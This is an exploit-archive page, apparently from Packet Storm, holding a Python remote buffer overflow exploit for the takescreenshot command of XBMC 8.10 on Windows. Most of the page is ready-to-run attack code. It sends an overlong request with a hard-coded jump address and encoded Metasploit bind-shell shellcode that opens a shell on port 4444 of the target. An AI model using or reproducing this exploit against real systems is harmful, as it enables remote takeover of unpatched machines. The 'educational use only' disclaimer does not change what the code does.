exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XBMC 8.10 takescreenshot Overflow

XBMC 8.10 takescreenshot Overflow
Posted Apr 1, 2009
Authored by n00b

XBMC version 8.10 takescreenshot remote buffer overflow exploit for Windows.

tags | exploit, remote, overflow
systems | windows
SHA-256 | eba0bb541e3a78ea046d3e1678e22f7cb2080253e1cfabb4b322ef3d94d508c4

XBMC 8.10 takescreenshot Overflow

Change Mirror Download
#!/usr/bin/env python 
'''
Xbmc takescreenshot request remote buffer overflow 8.10 !!!

Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/
Release date:April the 1st 2009

versions affected:
Linux windows < tested
other versions are also possibly affected.

Restrictions:No restrictions

This exploit happens when parsing and overly long file name
to the server using the takescreenshot command.
there is a description in the poc code.

When passing this to the http server we can evade url: filtering
as it is passed to the application as an overly long dir.
This means we can use any shell code we wish.

We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.

Credits to n00b for finding the buffer overflow and writing
poc code and exploit.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''

import sys, socket
import struct

port = 80
host = sys.argv[1]

Start_url ='xbmcCmds/xbmcHttp?command=takescreenshot('
Junk_buffer = 'A'*1036
Jump_esp = struct.pack('<L',0x77F84143)

Shell_code=(#win32_bind -EXITFUNC=seh LPORT=4444 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
"\x4e\x36\x46\x32\x46\x32\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x58"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x47\x45\x4e\x4b\x48"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x48\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d"
"\x46\x46\x4b\x48\x43\x44\x42\x53\x4b\x38\x42\x34\x4e\x30\x4b\x38"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x45\x4a\x36"
"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
"\x43\x35\x48\x36\x4a\x46\x43\x33\x44\x53\x4a\x46\x47\x37\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x45\x4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x55\x43\x55\x43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
"\x4e\x45\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41"
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
"\x42\x35\x46\x45\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x46"
"\x4d\x56\x49\x48\x45\x4e\x4c\x46\x42\x35\x49\x35\x49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x34\x4e\x52"
"\x43\x59\x4d\x48\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x45\x41\x55\x41\x35\x41\x45\x4c\x36"
"\x41\x30\x41\x55\x41\x35\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"

)



End_url ='.jpg;false;0;300;200;90)'

# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to the socket
c.connect((host, port))

Request = (Start_url + Junk_buffer + Jump_esp + Shell_code + End_url)

# create a file-like object to read
fileobj = c.makefile('r', 0)

# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close